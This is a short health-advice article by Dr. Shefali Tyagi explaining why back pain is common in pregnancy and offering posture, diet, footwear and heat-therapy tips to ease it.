Tips to manage Back Pain in pregnancy – Dr. Shefali Tyagi

Back pain is very common in pregnancy. The reasons could be there is a little calcium deficiency in the body because the baby is actively taking the calcium from your bones. The center of gravity for the pregnant woman changes because of the extra weight she carries and because of the hormone relaxin which is secreted because of pregnancy. It relaxes all the joints resulting in an ache in the back or hips. So what to do if you have back pain? If you are a working woman, and you have a sitting posture, than change your position every 45 minutes to 1 hour. Take a round around the office, so that the muscles do not have to be in the same position. Secondly, don’t slouch on the chair or sit half way through the chair and bent forward. You have to sit right till the end of the chair, keep a pillow or a cushion towards the back so that the whole back is supported. Third thing is don’t bend. You have to squat down. You have to keep the back straight, but bend at the knees. Fourth is have a good diet rich in calcium and don’t miss out your calcium supplements. Have them daily. Don’t wear high heels. Have flats also so that your center of gravity is not affected. Inspite of this, when you come back home, if you have a back pain, it is safe to use a heating pad or a hot water bottle or a bag to give fermentation and then apply the local gels to give relief from the pain.
